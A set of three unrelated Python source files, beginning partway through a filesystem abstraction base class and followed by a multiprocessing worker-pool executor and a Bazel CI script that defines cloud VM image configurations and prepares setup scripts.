# type of lock that should be there. None == no lock,
# True == a proper lock, False == a dummy lock.
state = self.__dict__.copy()
lock = state.get("_lock",None)
if lock is not None:
if isinstance(lock,threading._RLock):
state["_lock"] = True
else:
state["_lock"] = False
return state
def __setstate__(self,state):
self.__dict__.update(state)
lock = state.get("_lock")
if lock is not None:
if lock:
self._lock = threading.RLock()
else:
self._lock = DummyLock()
def getmeta(self, meta_name, default=NoDefaultMeta):
"""Retrieve a meta value associated with an FS object.
Meta values are a way for an FS implementation to report potentially
useful information associated with the file system.
A meta key is a lower case string with no spaces. Meta keys may also
be grouped in namespaces in a dotted notation, e.g. 'atomic.namespaces'.
FS implementations aren't obliged to return any meta values, but the
following are common:
* *read_only* True if the file system cannot be modified
* *thread_safe* True if the implementation is thread safe
* *network* True if the file system requires network access
* *unicode_paths* True if the file system supports unicode paths
* *case_insensitive_paths* True if the file system ignores the case of paths
* *atomic.makedir* True if making a directory is an atomic operation
* *atomic.rename* True if rename is an atomic operation, (and not implemented as a copy followed by a delete)
* *atomic.setcontents* True if the implementation supports setting the contents of a file as an atomic operation (without opening a file)
* *free_space* The free space (in bytes) available on the file system
* *total_space* The total space (in bytes) available on the file system
* *virtual* True if the filesystem defers to other filesystems
FS implementations may expose non-generic meta data through a self-named namespace. e.g. ``"somefs.some_meta"``
Since no meta value is guaranteed to exist, it is advisable to always supply a
default value to ``getmeta``.
:param meta_name: The name of the meta value to retrieve
:param default: An option default to return, if the meta value isn't present
:raises `fs.errors.NoMetaError`: If specified meta value is not present, and there is no default
"""
if meta_name not in self._meta:
if default is not NoDefaultMeta:
return default
raise NoMetaError(meta_name=meta_name)
return self._meta[meta_name]
def hasmeta(self, meta_name):
"""Check that a meta value is supported
:param meta_name: The name of a meta value to check
:rtype: bool
"""
try:
self.getmeta(meta_name)
except NoMetaError:
return False
return True
def getsyspath(self, path, allow_none=False):
"""Returns the system path (a path recognized by the OS) if one is present.
If the path does not map to a system path (and `allow_none` is False)
then a NoSysPathError exception is thrown. Otherwise, the system
path will be returned as a unicode string.
:param path: a path within the filesystem
:param allow_none: if True, this method will return None when there is no system path,
rather than raising NoSysPathError
:type allow_none: bool
:raises `fs.errors.NoSysPathError`: if the path does not map on to a system path, and allow_none is set to False (default)
:rtype: unicode
"""
if not allow_none:
raise NoSysPathError(path=path)
return None
def hassyspath(self, path):
"""Check if the path maps to a system path (a path recognized by the OS).
:param path: path to check
:returns: True if `path` maps to a system path
:rtype: bool
"""
return self.getsyspath(path, allow_none=True) is not None
def getpathurl(self, path, allow_none=False):
"""Returns a url that corresponds to the given path, if one exists.
If the path does not have an equivalent URL form (and allow_none is False)
then a :class:`~fs.errors.NoPathURLError` exception is thrown. Otherwise the URL will be
returns as an unicode string.
:param path: a path within the filesystem
:param allow_none: if true, this method can return None if there is no
URL form of the given path
:type allow_none: bool
:raises `fs.errors.NoPathURLError`: If no URL form exists, and allow_none is False (the default)
:rtype: unicode
"""
if not allow_none:
raise NoPathURLError(path=path)
return None
def haspathurl(self, path):
"""Check if the path has an equivalent URL form
:param path: path to check
:returns: True if `path` has a URL form
:rtype: bool
"""
return self.getpathurl(path, allow_none=True) is not None
def open(self, path, mode="r", **kwargs):
"""Open a the given path as a file-like object.
:param path: a path to file that should be opened
:param mode: mode of file to open, identical to the mode string used
in 'file' and 'open' builtins
:param kwargs: additional (optional) keyword parameters that may
be required to open the file
:rtype: a file-like object
"""
raise UnsupportedError("open file")
def safeopen(self, path, mode="r", **kwargs):
"""Like :py:meth:`~fs.base.FS.open`, but returns a :py:class:`~fs.base.NullFile` if the file could not be opened.
A ``NullFile`` is a dummy file which has all the methods of a file-like object,
but contains no data.
:param path: a path to file that should be opened
:param mode: mode of file to open, identical to the mode string used
in 'file' and 'open' builtins
:param kwargs: additional (optional) keyword parameters that may
be required to open the file
:rtype: a file-like object
"""
try:
f = self.open(path, mode, **kwargs)
except ResourceNotFoundError:
return NullFile()
return f
def symlink(self, linkto, path):
"""Creates a symlink.
:param linkto: To where symlink links to.
:param path: Path where we want to create symlink.
:rtype: None
"""
raise UnsupportedError("symlink")
def readlink(self, path):
"""Reads a symlink.
:param path: a path of link to read
:rtype: a dir/file where link points to
"""
raise UnsupportedError("readlink")
def chmod(self, path, mode):
"""Changes permissions of a file.
:param path: Path of a file.
:type path: string
:param mode: ORed combinatio of stat.S_*
:type path: integer.
"""
raise UnsupportedError("chmod")
def exists(self, path):
"""Check if a path references a valid resource.
:param path: A path in the filesystem
:rtype: bool
"""
return self.isfile(path) or self.isdir(path)
def isdir(self, path):
"""Check if a path references a directory.
:param path: a path in the filesystem
:rtype: bool
"""
raise UnsupportedError("check for directory")
def isfile(self, path):
"""Check if a path references a file.
:param path: a path in the filesystem
:rtype: bool
"""
raise UnsupportedError("check for file")
def __iter__(self):
""" Iterates over paths returned by :py:meth:`~fs.base.listdir` method with default params. """
for f in self.listdir():
yield f
def listdir(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Lists the the files and directories under a given path.
The directory contents are returned as a list of unicode paths.
:param path: root of the path to list
:type path: string
:param wildcard: Only returns paths that match this wildcard
:type wildcard: string containing a wildcard, or a callable that accepts a path and returns a boolean
:param full: returns full paths (relative to the root)
:type full: bool
:param absolute: returns absolute paths (paths beginning with /)
:type absolute: bool
:param dirs_only: if True, only return directories
:type dirs_only: bool
:param files_only: if True, only return files
:type files_only: bool
:rtype: iterable of paths
:raises `fs.errors.ResourceNotFoundError`: if the path is not found
:raises `fs.errors.ResourceInvalidError`: if the path exists, but is not a directory
"""
raise UnsupportedError("list directory")
def listdirinfo(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Retrieves a list of paths and path info under a given path.
This method behaves like listdir() but instead of just returning
the name of each item in the directory, it returns a tuple of the
name and the info dict as returned by getinfo.
This method may be more efficient than calling
:py:meth:`~fs.base.FS.getinfo` on each individual item returned by :py:meth:`~fs.base.FS.listdir`, particularly
for network based filesystems.
:param path: root of the path to list
:param wildcard: filter paths that match this wildcard
:param dirs_only: only retrieve directories
:type dirs_only: bool
:param files_only: only retrieve files
:type files_only: bool
:raises `fs.errors.ResourceNotFoundError`: If the path is not found
:raises `fs.errors.ResourceInvalidError`: If the path exists, but is not a directory
"""
path = normpath(path)
def getinfo(p):
try:
if full or absolute:
return self.getinfo(p)
else:
return self.getinfo(pathjoin(path,p))
except FSError:
return {}
return [(p, getinfo(p))
for p in self.listdir(path,
wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only)]
def _listdir_helper(self, path,
entries,
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""A helper method called by listdir method that applies filtering.
Given the path to a directory and a list of the names of entries within
that directory, this method applies the semantics of the listdir()
keyword arguments. An appropriately modified and filtered list of
directory entries is returned.
"""
if dirs_only and files_only:
raise ValueError("dirs_only and files_only can not both be True")
if wildcard is not None:
if not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
entries = [p for p in entries if wildcard(p)]
if dirs_only:
entries = [p for p in entries if self.isdir(pathjoin(path, p))]
elif files_only:
entries = [p for p in entries if self.isfile(pathjoin(path, p))]
if full:
entries = [pathjoin(path, p) for p in entries]
elif absolute:
entries = [abspath(pathjoin(path, p)) for p in entries]
return entries
def ilistdir(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Generator yielding the files and directories under a given path.
This method behaves identically to :py:meth:`fs.base.FS.listdir` but returns an generator
instead of a list. Depending on the filesystem this may be more
efficient than calling :py:meth:`fs.base.FS.listdir` and iterating over the resulting list.
"""
return iter(self.listdir(path,
wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only))
def ilistdirinfo(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Generator yielding paths and path info under a given path.
This method behaves identically to :py:meth:`~fs.base.listdirinfo` but returns an generator
instead of a list. Depending on the filesystem this may be more
efficient than calling :py:meth:`~fs.base.listdirinfo` and iterating over the resulting
list.
"""
return iter(self.listdirinfo(path,
wildcard,
full,
absolute,
dirs_only,
files_only))
def makedir(self, path, recursive=False, allow_recreate=False):
"""Make a directory on the filesystem.
:param path: path of directory
:param recursive: if True, any intermediate directories will also be created
:type recursive: bool
:param allow_recreate: if True, re-creating a directory wont be an error
:type allow_create: bool
:raises `fs.errors.DestinationExistsError`: if the path is already a directory, and allow_recreate is False
:raises `fs.errors.ParentDirectoryMissingError`: if a containing directory is missing and recursive is False
:raises `fs.errors.ResourceInvalidError`: if a path is an existing file
"""
raise UnsupportedError("make directory")
def remove(self, path):
"""Remove a file from the filesystem.
:param path: Path of the resource to remove
:raises `fs.errors.ResourceNotFoundError`: if the path does not exist
:raises `fs.errors.ResourceInvalidError`: if the path is a directory
"""
raise UnsupportedError("remove resource")
def removedir(self, path, recursive=False, force=False):
"""Remove a directory from the filesystem
:param path: path of the directory to remove
:param recursive: if True, empty parent directories will be removed
:type recursive: bool
:param force: if True, any directory contents will be removed
:type force: bool
:raises `fs.errors.ResourceNotFoundError`: if the path does not exist
:raises `fs.errors.ResourceInvalidError`: if the path is not a directory
:raises `fs.errors.DirectoryNotEmptyError`: if the directory is not empty and force is False
"""
raise UnsupportedError("remove directory")
def rename(self, src, dst):
"""Renames a file or directory
:param src: path to rename
:param dst: new name
"""
raise UnsupportedError("rename resource")
@convert_os_errors
def settimes(self, path, accessed_time=None, modified_time=None):
"""Set the accessed time and modified time of a file
:param path: path to a file
:param accessed_time: a datetime object the file was accessed (defaults to current time)
:param modified_time: a datetime object the file was modified (defaults to current time)
"""
sys_path = self.getsyspath(path, allow_none=True)
if sys_path is not None:
now = datetime.datetime.now()
if accessed_time is None:
accessed_time = now
if modified_time is None:
modified_time = now
accessed_time = int(time.mktime(accessed_time.timetuple()))
modified_time = int(time.mktime(modified_time.timetuple()))
os.utime(sys_path, (accessed_time, modified_time))
return True
else:
raise UnsupportedError("settimes")
def getinfo(self, path):
"""Returns information for a path as a dictionary. The exact content of
this dictionary will vary depending on the implementation, but will
likely include a few common values. The following values will be found
in info dictionaries for most implementations:
* "size" - Number of bytes used to store the file or directory
* "created_time" - A datetime object containing the time the resource was created
* "accessed_time" - A datetime object containing the time the resource was last accessed
* "modified_time" - A datetime object containing the time the resource was modified
:param path: a path to retrieve information for
:rtype: dict
"""
raise UnsupportedError("get resource info")
def desc(self, path):
"""Returns short descriptive text regarding a path. Intended mainly as
a debugging aid.
:param path: A path to describe
:rtype: str
"""
if not self.exists(path):
return ''
try:
sys_path = self.getsyspath(path)
except NoSysPathError:
return "No description available"
return sys_path
def getcontents(self, path):
"""Returns the contents of a file as a string.
:param path: A path of file to read
:rtype: str
:returns: file contents
"""
f = None
try:
f = self.open(path, "rb")
contents = f.read()
return contents
finally:
if f is not None:
f.close()
def setcontents(self, path, data, chunk_size=1024*64):
"""A convenience method to create a new file from a string or file-like object
:param path: a path of the file to create
:param data: a string or a file-like object containing the contents for the new file
:param chunk_size: Number of bytes to read in a chunk, if the implementation has to resort to a read / copy loop
"""
if not data:
self.createfile(path)
else:
f = None
try:
f = self.open(path, 'wb')
if hasattr(data, "read"):
read = data.read
write = f.write
chunk = read(chunk_size)
while chunk:
write(chunk)
chunk = read(chunk_size)
else:
f.write(data)
if hasattr(f, 'flush'):
f.flush()
finally:
if f is not None:
f.close()
def setcontents_async(self,
path,
data,
chunk_size=1024*64,
progress_callback=None,
finished_callback=None,
error_callback=None):
"""Create a new file from a string or file-like object asynchronously
This method returns a ``threading.Event`` object. Call the ``wait`` method on the event object
to block until all data has been written, or simply ignore it.
:param path: a path of the file to create
:param data: a string or a file-like object containing the contents for the new file
:param chunk_size: Number of bytes to read and write in a chunk
:param progress_callback: A function that is called periodically
with the number of bytes written.
:param finished_callback: A function that is called when all data has been written
:param error_callback: A function that is called with an exception
object if any error occurs during the copy process.
:returns: An event object that is set when the copy is complete, call
the `wait` method of this object to block until the data is written
"""
if progress_callback is None:
progress_callback = lambda bytes_written:None
def do_setcontents():
try:
f = None
try:
f = self.open(path, 'wb')
progress_callback(0)
if hasattr(data, "read"):
bytes_written = 0
read = data.read
write = f.write
chunk = read(chunk_size)
while chunk:
write(chunk)
bytes_written += len(chunk)
progress_callback(bytes_written)
chunk = read(chunk_size)
else:
f.write(data)
progress_callback(len(data))
if finished_callback is not None:
finished_callback()
finally:
if f is not None:
f.close()
except Exception, e:
if error_callback is not None:
error_callback(e)
finally:
finished_event.set()
finished_event = threading.Event()
threading.Thread(target=do_setcontents).start()
return finished_event
def createfile(self, path, wipe=False):
"""Creates an empty file if it doesn't exist
:param path: path to the file to create
:param wipe: if True, the contents of the file will be erased
"""
if not wipe and self.isfile(path):
return
f = None
try:
f = self.open(path, 'w')
finally:
if f is not None:
f.close()
def opendir(self, path):
"""Opens a directory and returns a FS object representing its contents.
:param path: path to directory to open
:rtype: an FS object
"""
from fs.wrapfs.subfs import SubFS
if not self.exists(path):
raise ResourceNotFoundError(path)
return SubFS(self, path)
def walk(self,
path="/",
wildcard=None,
dir_wildcard=None,
search="breadth",
ignore_errors=False):
"""Walks a directory tree and yields the root path and contents.
Yields a tuple of the path of each directory and a list of its file
contents.
:param path: root path to start walking
:param wildcard: if given, only return files that match this wildcard
:type wildcard: a string containing a wildcard (e.g. `*.txt`) or a callable that takes the file path and returns a boolean
:param dir_wildcard: if given, only walk directories that match the wildcard
:type dir_wildcard: a string containing a wildcard (e.g. `*.txt`) or a callable that takes the directory name and returns a boolean
:param search: a string identifying the method used to walk the directories. There are two such methods:
* ``"breadth"`` yields paths in the top directories first
* ``"depth"`` yields the deepest paths first
:param ignore_errors: ignore any errors reading the directory
"""
def listdir(path, *args, **kwargs):
if ignore_errors:
try:
return self.listdir(path, *args, **kwargs)
except:
return []
else:
return self.listdir(path, *args, **kwargs)
if wildcard is None:
wildcard = lambda f:True
elif not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
if dir_wildcard is None:
dir_wildcard = lambda f:True
elif not callable(dir_wildcard):
dir_wildcard_re = re.compile(fnmatch.translate(dir_wildcard))
dir_wildcard = lambda fn:bool (dir_wildcard_re.match(fn))
if search == "breadth":
dirs = [path]
while dirs:
current_path = dirs.pop()
paths = []
try:
for filename in listdir(current_path):
path = pathjoin(current_path, filename)
if self.isdir(path):
if dir_wildcard(path):
dirs.append(path)
else:
if wildcard(filename):
paths.append(filename)
except ResourceNotFoundError:
# Could happen if another thread / process deletes something whilst we are walking
pass
yield (current_path, paths)
elif search == "depth":
def recurse(recurse_path):
try:
for path in listdir(recurse_path, wildcard=dir_wildcard, full=True, dirs_only=True):
for p in recurse(path):
yield p
except ResourceNotFoundError:
# Could happen if another thread / process deletes something whilst we are walking
pass
yield (recurse_path, listdir(recurse_path, wildcard=wildcard, files_only=True))
for p in recurse(path):
yield p
else:
raise ValueError("Search should be 'breadth' or 'depth'")
def walkfiles(self,
path="/",
wildcard=None,
dir_wildcard=None,
search="breadth",
ignore_errors=False ):
"""Like the 'walk' method, but just yields file paths.
:param path: root path to start walking
:param wildcard: if given, only return files that match this wildcard
:type wildcard: A string containing a wildcard (e.g. `*.txt`) or a callable that takes the file path and returns a boolean
:param dir_wildcard: if given, only walk directories that match the wildcard
:type dir_wildcard: A string containing a wildcard (e.g. `*.txt`) or a callable that takes the directory name and returns a boolean
:param search: same as walk method
:param ignore_errors: ignore any errors reading the directory
"""
for path, files in self.walk(path, wildcard=wildcard, dir_wildcard=dir_wildcard, search=search, ignore_errors=ignore_errors):
for f in files:
yield pathjoin(path, f)
def walkdirs(self,
path="/",
wildcard=None,
search="breadth",
ignore_errors=False):
"""Like the 'walk' method but yields directories.
:param path: root path to start walking
:param wildcard: if given, only return directories that match this wildcard
:type wildcard: A string containing a wildcard (e.g. `*.txt`) or a callable that takes the directory name and returns a boolean
:param search: same as the walk method
:param ignore_errors: ignore any errors reading the directory
"""
for p, _files in self.walk(path, dir_wildcard=wildcard, search=search, ignore_errors=ignore_errors):
yield p
def getsize(self, path):
"""Returns the size (in bytes) of a resource.
:param path: a path to the resource
:rtype: integer
:returns: the size of the file
"""
info = self.getinfo(path)
size = info.get('size', None)
if size is None:
raise OperationFailedError("get size of resource", path)
return size
def copy(self, src, dst, overwrite=False, chunk_size=1024*64):
"""Copies a file from src to dst.
:param src: the source path
:param dst: the destination path
:param overwrite: if True, then an existing file at the destination may
be overwritten; If False then DestinationExistsError
will be raised.
:param chunk_size: size of chunks to use if a simple copy is required
(defaults to 64K).
"""
if not self.isfile(src):
if self.isdir(src):
raise ResourceInvalidError(src,msg="Source is not a file: %(path)s")
raise ResourceNotFoundError(src)
if not overwrite and self.exists(dst):
raise DestinationExistsError(dst)
src_syspath = self.getsyspath(src, allow_none=True)
dst_syspath = self.getsyspath(dst, allow_none=True)
if src_syspath is not None and dst_syspath is not None:
self._shutil_copyfile(src_syspath, dst_syspath)
else:
src_file = None
try:
src_file = self.open(src, "rb")
self.setcontents(dst, src_file, chunk_size=chunk_size)
except ResourceNotFoundError:
if self.exists(src) and not self.exists(dirname(dst)):
raise ParentDirectoryMissingError(dst)
finally:
if src_file is not None:
src_file.close()
@classmethod
@convert_os_errors
def _shutil_copyfile(cls, src_syspath, dst_syspath):
try:
shutil.copyfile(src_syspath, dst_syspath)
except IOError, e:
# shutil reports ENOENT when a parent directory is missing
if getattr(e,"errno",None) == 2:
if not os.path.exists(dirname(dst_syspath)):
raise ParentDirectoryMissingError(dst_syspath)
raise
@classmethod
@convert_os_errors
def _shutil_movefile(cls, src_syspath, dst_syspath):
shutil.move(src_syspath, dst_syspath)
def move(self, src, dst, overwrite=False, chunk_size=16384):
"""moves a file from one location to another.
:param src: source path
:param dst: destination path
:param overwrite: if True, then an existing file at the destination path
will be silently overwritten; if False then an exception
will be raised in this case.
:param overwrite: When True the destination will be overwritten (if it exists),
otherwise a DestinationExistsError will be thrown
:type overwrite: bool
:param chunk_size: Size of chunks to use when copying, if a simple copy
is required
:type chunk_size: integer
"""
src_syspath = self.getsyspath(src, allow_none=True)
dst_syspath = self.getsyspath(dst, allow_none=True)
# Try to do an os-level rename if possible.
# Otherwise, fall back to copy-and-remove.
if src_syspath is not None and dst_syspath is not None:
if not os.path.isfile(src_syspath):
if os.path.isdir(src_syspath):
raise ResourceInvalidError(src, msg="Source is not a file: %(path)s")
raise ResourceNotFoundError(src)
if not overwrite and os.path.exists(dst_syspath):
raise DestinationExistsError(dst)
try:
os.rename(src_syspath, dst_syspath)
return
except OSError:
pass
self.copy(src, dst, overwrite=overwrite, chunk_size=chunk_size)
self.remove(src)
def movedir(self, src, dst, overwrite=False, ignore_errors=False, chunk_size=16384):
"""moves a directory from one location to another.
:param src: source directory path
:param dst: destination directory path
:param overwrite: if True then any existing files in the destination
directory will be overwritten
:param ignore_errors: if True then this method will ignore FSError
exceptions when moving files
:param chunk_size: size of chunks to use when copying, if a simple copy
is required
"""
if not self.isdir(src):
if self.isfile(src):
raise ResourceInvalidError(src, msg="Source is not a directory: %(path)s")
raise ResourceNotFoundError(src)
if not overwrite and self.exists(dst):
raise DestinationExistsError(dst)
src_syspath = self.getsyspath(src, allow_none=True)
dst_syspath = self.getsyspath(dst, allow_none=True)
if src_syspath is not None and dst_syspath is not None:
try:
os.rename(src_syspath,dst_syspath)
return
except OSError:
pass
def movefile_noerrors(src, dst, **kwargs):
try:
return self.move(src, dst, **kwargs)
except FSError:
return
if ignore_errors:
movefile = movefile_noerrors
else:
movefile = self.move
src = abspath(src)
dst = abspath(dst)
if dst:
self.makedir(dst, allow_recreate=overwrite)
for dirname, filenames in self.walk(src, search="depth"):
dst_dirname = relpath(frombase(src, abspath(dirname)))
dst_dirpath = pathjoin(dst, dst_dirname)
self.makedir(dst_dirpath, allow_recreate=True, recursive=True)
for filename in filenames:
src_filename = pathjoin(dirname, filename)
dst_filename = pathjoin(dst_dirpath, filename)
movefile(src_filename, dst_filename, overwrite=overwrite, chunk_size=chunk_size)
self.removedir(dirname)
def copydir(self, src, dst, overwrite=False, ignore_errors=False, chunk_size=16384):
"""copies a directory from one location to another.
:param src: source directory path
:param dst: destination directory path
:param overwrite: if True then any existing files in the destination
directory will be overwritten
:type overwrite: bool
:param ignore_errors: if True, exceptions when copying will be ignored
:type ignore_errors: bool
:param chunk_size: size of chunks to use when copying, if a simple copy
is required (defaults to 16K)
"""
if not self.isdir(src):
raise ResourceInvalidError(src, msg="Source is not a directory: %(path)s")
def copyfile_noerrors(src, dst, **kwargs):
try:
return self.copy(src, dst, **kwargs)
except FSError:
return
if ignore_errors:
copyfile = copyfile_noerrors
else:
copyfile = self.copy
src = abspath(src)
dst = abspath(dst)
if not overwrite and self.exists(dst):
raise DestinationExistsError(dst)
if dst:
self.makedir(dst, allow_recreate=overwrite)
for dirname, filenames in self.walk(src):
dst_dirname = relpath(frombase(src, abspath(dirname)))
dst_dirpath = pathjoin(dst, dst_dirname)
self.makedir(dst_dirpath, allow_recreate=True, recursive=True)
for filename in filenames:
src_filename = pathjoin(dirname, filename)
dst_filename = pathjoin(dst_dirpath, filename)
copyfile(src_filename, dst_filename, overwrite=overwrite, chunk_size=chunk_size)
def isdirempty(self, path):
"""Check if a directory is empty (contains no files or sub-directories)
:param path: a directory path
:rtype: bool
"""
path = normpath(path)
iter_dir = iter(self.listdir(path))
try:
iter_dir.next()
except StopIteration:
return True
return False
def makeopendir(self, path, recursive=False):
"""makes a directory (if it doesn't exist) and returns an FS object for
the newly created directory.
:param path: path to the new directory
:param recursive: if True any intermediate directories will be created
"""
self.makedir(path, allow_recreate=True, recursive=recursive)
dir_fs = self.opendir(path)
return dir_fs
def printtree(self, max_levels=5):
"""Prints a tree structure of the FS object to the console
:param max_levels: The maximum sub-directories to display, defaults to
5. Set to None for no limit
"""
from fs.utils import print_fs
print_fs(self, max_levels=max_levels)
tree = printtree
def browse(self, hide_dotfiles=False):
"""Displays the FS tree in a graphical window (requires wxPython)
:param hide_dotfiles: If True, files and folders that begin with a dot will be hidden
"""
from fs.browsewin import browse
browse(self, hide_dotfiles)
def getmmap(self, path, read_only=False, copy=False):
"""Returns a mmap object for this path.
See http://docs.python.org/library/mmap.html for more details on the mmap module.
:param path: A path on this filesystem
:param read_only: If True, the mmap may not be modified
:param copy: If False then changes wont be written back to the file
:raises `fs.errors.NoMMapError`: Only paths that have a syspath can be opened as a mmap
"""
syspath = self.getsyspath(path, allow_none=True)
if syspath is None:
raise NoMMapError(path)
try:
import mmap
except ImportError:
raise NoMMapError(msg="mmap not supported")
if read_only:
f = open(syspath, 'rb')
access = mmap.ACCESS_READ
else:
if copy:
f = open(syspath, 'rb')
access = mmap.ACCESS_COPY
else:
f = open(syspath, 'r+b')
access = mmap.ACCESS_WRITE
m = mmap.mmap(f.fileno(), 0, access=access)
return m
def flags_to_mode(flags):
"""Convert an os.O_* flag bitmask into an FS mode string."""
if flags & os.O_WRONLY:
if flags & os.O_TRUNC:
mode = "w"
elif flags & os.O_APPEND:
mode = "a"
else:
mode = "r+"
elif flags & os.O_RDWR:
if flags & os.O_TRUNC:
mode = "w+"
elif flags & os.O_APPEND:
mode = "a+"
else:
mode = "r+"
else:
mode = "r"
if flags & os.O_EXCL:
mode += "x"
return mode
|
process_executor.py
|
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# @author: XYZ
# @file: process_executor.py
# @time: 2021.01.28 13:12
# @desc:
import time
import logging
import threading
from abc import ABCMeta, abstractmethod
from multiprocessing import Process, JoinableQueue
import nspider.utilities.constant as const
from nspider.core.log import MultiprocessLog
class ProcessExecutor(Process, metaclass=ABCMeta):
def __init__(self,
name,
shared_memory_handler,
CORE_POOL_SIZE: int,
MAX_POOL_SIZE: int,
KEEP_ALIVE_TIME: float,
RETYR_NUM: int,
worker_class,
TPS=-1):
super().__init__()
self.__stop_signal = False
self.__pause_signal = False
self.name = name
self.shared_memory_handler = shared_memory_handler
self.TPS = TPS
self.RETRY_NUM = RETYR_NUM
self.CORE_POOL_SIZE = CORE_POOL_SIZE
self.MAX_POOL_SIZE = MAX_POOL_SIZE
self.KEEP_ALIVE_TIME = KEEP_ALIVE_TIME
self.job_queue = JoinableQueue(self.MAX_POOL_SIZE * 2)
self.worker_class = worker_class
self.workers = {}
self.worker_states = {}
self.__worker_count = 0
self.__init_worker_states()
def __init_worker_states(self):
for i in range(self.MAX_POOL_SIZE):
self.worker_states[str(i)] = const.WORKER_EMPTY
def __get_first_empty_worker_id(self) -> int:
for i in range(self.MAX_POOL_SIZE):
if self.worker_states[str(i)] == const.WORKER_EMPTY:
return i
@property
def pause_signal(self):
return self.__pause_signal
@property
def stop_signal(self):
return self.__stop_signal
@property
def worker_count(self):
count = 0
for k, v in self.worker_states.items():
if v != const.WORKER_EMPTY:
count += 1
return count
@stop_signal.setter
def stop_signal(self, signal: bool):
self.__stop_signal = signal
@pause_signal.setter
def pause_signal(self, signal: bool):
self.__pause_signal = signal
@abstractmethod
def get_job(self) -> object:
raise NotImplementedError
@abstractmethod
def create_worker(self, worker_class, is_core=True, init_job=None) -> object:
raise NotImplementedError
def update_worker_state(self, id_, state):
if not self.worker_states.get(id_):
return
else:
self.worker_states[id_] = state
if state == const.WORKER_EMPTY:
self.workers[id_] = None
def __receiver_process(self):
while not self.stop_signal:
if self.pause_signal:
time.sleep(1)
continue
job = self.get_job()
# self.logger.info(self.worker_states)
if self.worker_count < self.CORE_POOL_SIZE:
core_worker = self.create_worker(self.worker_class, str(self.__get_first_empty_worker_id()), is_core=True, init_job=job)
self.workers[str(core_worker.id)] = core_worker
self.update_worker_state(core_worker.id, const.WORKER_INIT)
core_worker.start()
elif self.job_queue.full():
if self.worker_count < self.MAX_POOL_SIZE:
non_core_worker = self.create_worker(self.worker_class, str(self.__get_first_empty_worker_id()), is_core=False, init_job=job)
self.workers[str(non_core_worker.id)]= non_core_worker
self.update_worker_state(non_core_worker.id, const.WORKER_INIT)
non_core_worker.start()
else:
self.job_queue.put(job)
else:
self.job_queue.put(job)
def __init_inner_log(self):
MultiprocessLog.worker_configurer(self.shared_memory_handler.log_message_queue)
self.logger = logging.getLogger(self.name)
def ran(self):
pass
def __init_receiver(self):
self.receiver = threading.Thread(target=self.__receiver_process)
self.receiver.setDaemon(True)
self.receiver.start()
def before_waiting(self):
pass
def __wait_for_thread(self):
self.receiver.join()
def run(self):
self.__init_inner_log()
self.ran()
self.__init_receiver()
self.before_waiting()
self.__wait_for_thread()
|
create_images.py
|
#!/usr/bin/env python3
#
# Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import json
import os
import queue
import subprocess
import sys
import tempfile
import threading
import gcloud
import gcloud_utils
DEBUG = False
IMAGE_CREATION_VMS = {
# Find the newest FreeBSD 11 image via:
# gcloud compute images list --project freebsd-org-cloud-dev \
# --no-standard-images
# ('bk-freebsd11',): {
# 'source_image': 'https://www.googleapis.com/compute/v1/projects/freebsd-org-cloud-dev/global/images/freebsd-11-1-stable-amd64-2017-12-28',
# 'scripts': [
# 'setup-freebsd.sh',
# 'install-buildkite-agent.sh'
# ]
# },
"bk-docker": {
"project": "bazel-untrusted",
"zone": "us-central1-a",
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-1904",
"setup_script": "setup-docker.sh",
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
"bk-testing-docker": {
"project": "bazel-untrusted",
"zone": "us-central1-a",
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-1904",
"setup_script": "setup-docker.sh",
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
"bk-trusted-docker": {
"project": "bazel-public",
"zone": "us-central1-a",
"source_image_project": "ubuntu-os-cloud",
"source_image_family": "ubuntu-1904",
"setup_script": "setup-docker.sh",
"licenses": [
"https://www.googleapis.com/compute/v1/projects/vm-options/global/licenses/enable-vmx"
],
},
"bk-windows-java8": {
"project": "bazel-untrusted",
"zone": "us-central1-a",
"source_image_project": "windows-cloud",
"source_image_family": "windows-1809-core",
"setup_script": "setup-windows.ps1",
},
"bk-testing-windows-java8": {
"project": "bazel-untrusted",
"zone": "us-central1-a",
"source_image_project": "windows-cloud",
"source_image_family": "windows-1809-core",
"setup_script": "setup-windows.ps1",
},
"bk-trusted-windows-java8": {
"project": "bazel-public",
"zone": "us-central1-a",
"source_image_project": "windows-cloud",
"source_image_family": "windows-1809-core",
"setup_script": "setup-windows.ps1",
},
"windows-playground": {
"project": "di-cloud-exp",
"zone": "us-central1-a",
"network": "default",
"source_image_project": "windows-cloud",
"source_image_family": "windows-2019",
"setup_script": "setup-windows.ps1",
},
}
WORK_QUEUE = queue.Queue()
def run(args, **kwargs):
return subprocess.run(args, **kwargs)
def preprocess_setup_script(setup_script, is_windows):
output_file = tempfile.mkstemp()[1]
newline = "\r\n" if is_windows else "\n"
with open(output_file, "w", newline=newline) as f:
with open(setup_script, "r") as setup_script_file:
if is_windows:
f.write("$setup_script = @'\n")
f.write(setup_script_file.read() + "\n")
if is_windows:
f.write("'@\n")
f.write('[System.IO.File]::WriteAllLines("c:\\setup.ps1", $setup_script)\n')
return output_file
